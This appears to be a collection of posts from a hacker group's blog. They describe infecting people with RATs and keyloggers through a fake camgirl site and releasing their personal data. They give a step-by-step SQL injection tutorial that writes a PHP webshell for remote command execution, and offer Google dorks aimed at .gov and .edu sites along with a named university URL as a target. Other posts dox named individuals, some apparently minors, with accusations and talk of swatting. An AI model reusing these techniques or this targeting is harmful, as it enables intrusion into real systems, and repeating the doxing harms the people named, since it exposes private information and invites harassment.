Pedophilia – My Stand

#OpSickosDown

Greetings, 3ncrypti0n here.

Along with Dis0rder and GoDMisT, I have come across my fair share of pedophiles. I haven’t stumbled upon them on facebook, I search for pedophiles. Earlier in my career, I used to search for pedophiles to bring down once and for all. Keep in mind, this was back in the day when I was a 14 year old skid.

In order to take these pedophiles down, I would do as follows. I would portforward, make my RAT(remote administrator trojan), and then crypt it with a crypter I bought from HackForums(keep in mind I was a script kiddie back then). I would then setup a Silent Java Drive-By. For those of you who do not know, a SJDB is when a window prompts you to update Java, and you click “OK” and it silently installs the stub without your knowledge.

I would make a fake “camgirls” site, and the pedophiles would visit it, update Java, and become my slave. I would get 20 slaves a night, maybe even more. Once I had them RATted, I’d install a keylogger as well(for a backup), then I’d gain all their passwords, and other personal information. I would then release a dox on pastebin.

This is my experience with pedophilia. I would advertise on adult chatrooms(omegle, chat roullette, etc.) and spread my RAT via JDB there. This was an efficient method to gain bots, as well as bring down pedophiles. Please leave your thoughts about this below, whether I am being ethical, or a straight up bitch. I’d love to hear feedback.

38.987809 -77.509138

SQL Injection via Shell

What is the use of this ?
Have you ever injected some database , And never found the administrator control panel url ? YES , So apparentely you don’t have any chance of uploading your php backdoor(shell) , NO , You still have a chance by useing INTO() , OUTFILE() SQL commands , And with a little help of system(); , You will be able to read files from the server as a string , And also upload files to the webserver remotely .
Shall we start ?

Requirements :
1- A php backdoor(shell) – .txt
2- Basic knowledge with Structure Query Language (SQL).

So let’s say that you’ve injected a website , And no admin login page , This is your current query :

www.site.com/index.php?id=-1+union+select+1,2,3--

Now you’ll see the vulnerable columns count that is vulnerable to be injected into .
In my case it showed out that “2” Is the vulnerable column so that I’ll be injecting into it like this

www.site.com/index.php?id=-1+union+select+1,user,3+from+mysql.user--

If you get an error while doing this , Then you can’t use this method as you’re not privileged to read/write into the table ” mysql.user ”

Now If there’s no errors on the page , Then you can see the mysql.user name printed out on the webpage ..

somename

Now we need to check if the user has privileges to read/write/access/execute or not , In my case I’ll be doing this :

http://www.site.com/index.php?id=-1+union+select+1,group_concat(user,0x3a,file_priv),3from+mysql.user--


Now it should fetch all the users and their privileges.
It will look like this :

root:Y,root:Y,apache:N,somename_somename:Y

Okay so our username is “somename” now we are capable of editing/writing stuff on the webserver , To spawn a file into the webserver we will need to fetch out the source path disclosure , and to do this , You’ll need to cause an error to the webpage Hopefully The error will appear , And to cause this error you’ll try some thing like this .

www.site.com/index.php?id[]=-1

Now if it did work , You’ll get something like that

/var/www/vhost/username/data/www/sitename/

Now you gotta find a writable/accessible directory on the webserver , Usually “public_html” is writable , If not just surf abit to find some directory and try writing into it .

Now the system(); function comes in hand , We need to write/spawn some file ( phpbackdoor (shell) ) into the directory , Like this

www.index.com/index.php?id=-1+union+select+null,,null INTO OUTFILE /var/www/vhost/username/data/www/sitename/shell.php

Now we had to change our column names from valid strings into Nulls , Note : Nulls in SQL never means 0 , Then we replaced our vulnerable column with the famous system(); function that has a $_GET function That will allow us some Remote code execution to the Full path written at the end .

After running that , Our shell should be spawned successfuly , Now we got to see if it was spawned successfuly

www.site.com/shell.php

Now we should see some PHP error that got parsed , But Don’t worry that’s pretty normal , To get the Remote code execution to the server , We will do this :

shell.php?cmd=your command in here

And baam you should now be able to spawn your shell useing the wget() function .

This is all about it , Thanks for reading my thread ,
Greetings .

38.987680 -77.508992

Advanced SQL Injection Dorks

Hello Sirs,

I’ve recently noticed a few complaints of people not finding vulnerable sites. While this could be just lazyness, there is a way i use which uses a more advanced to find vulnerable sites with Google Dorks. This requires a brain, patience, and some effort. The reward is always great however.

What we’ll be covering:

– Advanced Google Dorks vs Normal
– Adv. Dork list
– How to maximize this information
– Tutorial list

While this tutorial is very basic and brief, i wish you all please leave me feedback. This isn’t a “Hacking” tutorial, but more of a resource. Thank you for reading and enjoy!

What’s a “Advanced” Google Dork?

A Adv. Google Dork is a dork which can be used to find unsaturated sites, free from the usual SQL Injections. A typical site with a index.php?id= will probably been attacked or scanned by many people. You want to find something fresh right?! Below is a example of a advanced dork:

inurl:index.php?id=7 site:DE

Let’s break it down:

index.php?id= is a typical dork, however, adding a 7 (or any number) makes you search ONLY id’s with a 7.

Site:DE makes the search results only .de sites (German.) This is especially useful for doing mini cyber attacks of sites of a oppressive government or something of that sort.

Now, with this, you can combine many differernt elements. For example, say you wanted to find a .edu or .gov, you would use a dork like this:

inurl:index.php?id=12 site:.gov

While it’s a simple change, this can greatly increase your chance of getting something big.

What kind of sites are good for SQL Injection?

Any site! However, if your wanting to have a bit more glory, you could go after a news site, .edu, .gov, etc. A few .edu’s will have student data, which can contain some real serious stuff! While just doing SQLi isn’t a big “Hacking” skill, it can be a portal to a admin panel, which from there can be used to deface a site. While i don’t recommend you deface random sites, you can find many tutorials on shelling and defacing in both Legion SF and public tutorials.

Example of a news dork:

inurl:news/view.php?id= site:NL

A vulnerable .edu for anyone wanting to practice. I’ve already looked around, and if your heart desires, feel free to take any of the info. I will warn, it does have alot of stuff that can get you in trouble, but none the less, it’s a good site to practice on.

http://pharmacyschool.usc.edu/faculty/?id=73

Use any id, 15-75 have been tested.

How can you benefit from a SQL injection? Well, if it’s a high profile site, you can simply say you’ve found a exploit, and show proof (Data leaked, logins, tables, etc.) and possibly gain a juicy award. Apple offers a spot on the Hall of Fame for finding a exploit on there site!

Finishing up…

Below i will include a few tutorials for SQLi, a list of dorks to work with, and general advice. I’m sorry for the rush, i have classes in the morning, and wanted to get this out. If you need a vulnerable list for a certain domain, please let me know and i’ll gladly find some for you. Again, i’m not myself very experienced in SQLi (Not my skill base..) but this is something many of you lazy and practice hungry people could use!

Small vulnerable list with a few advanced examples:

http://pastebin.com/iQUcNGuH
7k dorks by Sideswipe:
http://pastebin.com/x1rtqktj

Tutorials i used to learn with:

Union Based:
http://www.hackforums.net/showthread.php?tid=2061628
http://www.hackforums.net/showthread.php?tid=2085773

Error Based:
http://www.hackforums.net/showthread.php?tid=2085773

38.987383 -77.508276

Misconceptions of TOR

In this short lecture, I will explain some things about Tor.
Namely: what it is, what it was meant to be, why it’s still secure, how to use it safely, and why FBI exit nodes don’t mean a damn thing.

So, what exactly is TOR?

Tor is a low-latency anonymity network, designed primarily to provide anonymity and nothing more. Tor today is run almost entirely by volunteers and the Electronic Frontier Foundation, whose homepage can be found at http://eff.org The concept of onion routing, which is the core of the Tor network and what makes it function, was originally designed by the United States Navy for their own private usage, and later recreated in a more refined form by the Tor Project. It is not meant to be a full security solution.
Tor alone can, in most cases, provide strong anonymity to its user through the use of onion routing and RSA encryption.

How does onion routing work?

Onion routing was developed by Michael G. Reed (formerly of Extreme Networks), Paul F. Syverson, and David M. Goldschlag, and patented by the United States Navy in US Patent No. 6266704 (credit for this information: Wikipedia)
In an onion routing circuit, RSA encryption is used in layers. Each node can only decrypt one layer, because the layers involve encrypting the data with each node’s public key.
Only the node’s private key can see the data. This makes it very hard to correlate what traffic is being sent where, and to make any one node able to tell both the origin and content of the data.

But can’t my exit node tell who I am?

No. No it cannot.
Your exit node can only tell what you’re doing, not who you are.
Your entry node, on the other hand, can tell who you are but not what you’re doing.
The chances of BOTH of these nodes being run by the same, or cooperating, adversaries is slim to none.
Even if they were, there is also a middle node to help stop correlation-related attacks.
The worst case scenario, an exit node injecting malicious code into your stream, can be solved simply by good data hygiene and BLOCKING SCRIPTS.
Seriously. Block scripts. For the good of mankind, block fucking scripts. It’s worth the 5 seconds inconvenience.
Also, if you’re that worried about the exit seeing the content you’re sending and receiving, use TLS between yourself and your destination.
There is no magical TLS/SSL break that can be done without being noticed by a keen eye. Trust me on this one.

But… but what about Freedom Hosting?

The Freedom Hosting hack, some say, should be an example of why not to use Tor.
I, on the other hand, see it as a testament to Tor’s security.
This attack was carried out because the FBI could not attack the Tor network directly.
They were forced to compromise not the network itself, but a single hidden service host.
Not only that, but the malware injected into the pages was JavaScript-based and only affected Windows users, using the official Tor Browser.
For this reason, this operation should be upheld as proof that the Tor network is safe. If it were not, things would’ve gone much more smoothly for our Federal friends.
There are more ways to connect an application to Tor than by using the official TBB. We should all know this by now.

OMG FBI EXIT NODES!!

Stop spreading fear, uncertainty and doubt. An FBI exit node is no different from any other exit node.
They may collect data, yes, but what determines what data they receive, and if they can trace it back to you, is you.
An exit node can see what you’re sending, but not who you are. Use this to your advantage.
Due diligence while using Tor can thwart literally any attempt to trace you.
Sandbox your browser, use SSL/TLS, use an outbound firewall, make sure you’re not executing any possibly malicious code and you’re golden.

(x) doesn’t support Tor!

Deal with it. More specifically, deal with it by transparently proxying the application using ADVor, or iptables on Linux.
There’s a great Wiki page about this written by the Tor devs themselves, hosted here: https://trac.torproject.org/projects/tor/wiki/doc/TransparentProxy

Conclusion/questions/comments/missed stuff?

Thanks for reading, and I know this isn’t much of a “tutorial” so to speak, as it is a correction of your mindset about Tor.
Please feel free to contact me or correct me on things I posted in this article, and I will update it as soon as I can.

38.987323 -77.508265

Kyle Hudson Story

Viewers, welcome and greetings from us here at TI,TC, and TR. Today, I, 3ncrypti0n have a tale of betrayal to tell. There was a 18 year old boy, of the name Kyle Hudson. Kyle was a trustable kid, he was nice to talk to, had decent manners, etc. Kyle and I had started working on a private server for MineCraft. He didn’t know any JAVA, but he was of help in graphics and web design. He knew basic CSS, so he wasn’t completely useless. Kyle and I had made roughly $3000 until one Saturday afternoon. Kyle had cut of our webhost, dedicated server, and had run off with our money. Correction… my money. I’ve had him keylogged and RATted since the beginning, so he was out of luck. I had gained all his information and had already developed a perfectly complete dox of him. I even got license plate #, and a picture of his car. Kyle Hudson is a fool to run off with my $3000, so I had released his dox on pastebin, and filled him with shame, making sure he would never show his face online ever again. We are The Intellectuals. We are The Rogue. We don’t tolerate bullshit. It’s too late to have expected us.

http://pastebin.com/UfCHM2m1

Anonymous Vs Voidmason

Voidmason currently has blew the tops off TI, and TC. In reference it is now time to take a stand, as our 3 operations go within anonymous. #OPDarkNet #OPSickosDown and the November Mask March. Voidmason has been discovered over his ways of ignroance, and interest. He is now known to be a pedophile, asking 13  year olds and under for nudes and Sex. In fortraying the Operations of anonymous, as I am a anon in US. 4 Other anon’s will be contacted today, to execute voidmason once and for all. Pedophiles can not stand, because pedophiles don’t belong in this community. Voidmason now being a target of anonymous, in Operation Darknet and Operation SickosDown, now puts everything he has at risks and is now becoming a threat and serious situation.

 

Photos From Friends:

http://prntscr.com/1j6l3x

http://prntscr.com/1j6n6f

Voidmason Killing Himself?

Voidmason recently this morning, faked to commit suicide for attention from his followers. Destroying his own reputation, he then goes after TC and a member of TR again. This most likely is gonna end in a permanent downfall / corruption for Voidmason. Stay tuned for videos of him getting busted, and possibly swatted! 🙂

Voidmason Story

15 year old James Cody Willingham, left Voidmason team to a downfall/corruption end. Yet still today, claiming to hack gets him no where. Standing in the sidelines Corrupt Isme is blamed for crashing his ‘group’ after the tragidy hack on his sites, computer,router,phone, and accounts. James Cody Willingham hacked 3 times by 3 different people, still yet today Mr Willingham believes himself to be a hacker. But In eyes of all the people, hes a 15 year old living in georgia. Voidmason’s so called Hacktavist group, claimed to have over 100k members within its association, with more investigating by Corrupt Isme. Shocking news was discovered, and known to be James Cody Willingham was serving his group and only he was in the so called hacktavist group. Voidmason claimed to of hacked millions of computers, and accounts throughout the world. Their operations came and ended, as their revolution only became a war with Rogue, The Cr0ws. Voidmason came to a hard downfall, after hackers legandly took over his accounts,computer,phone, and router. Today during the extent Corrupt isme blocked Voidmason on facebook, sending him a warning message to lay off his nerves and to stop antagonizing the situation. Voidmason is saying he will end up hacking his ex Fay Smith Aka Jenniffer Vivanco, for feeling to confront him and show her emotions for just finding out about him cheating with a female named Ravin aka Rayvin as he calls her

Photo Of Ravin[Rayvin]:

Photo Of Voidmason:

Voidmason is a pervert in my eyes, he is a manipulator, a wannabe hacker, he buys information from prepaid credit cards, and his moms bank account. Shortly after the fight and hack, Voidmason bought information on “Corrupt Isme” and released it while claiming he “Dox’d” Him, but he bought it as he admitted he did. Allegedly voidmason got tagged by other hackers, he couldn’t get anything back he begged Corrupt isme, to help him gain access back to his router and begged to give his email back to him. Voidmason is a cheater, player, wannabe hacker, he does pot, drinks, and says he is lonely with no friends. All True, because he pushes everybody away.

Truth behind him cheating on Jenniffer Vivanco, she found out and flipped out and gave voidmason aka James Cody Willingham a piece of her mind. He got mad and raged, then told Corrupt isme he was gonna hack her. He has no purpose, seems as if he gots anger issues as well.

Proof Of Evidence:

[To Be Continued…]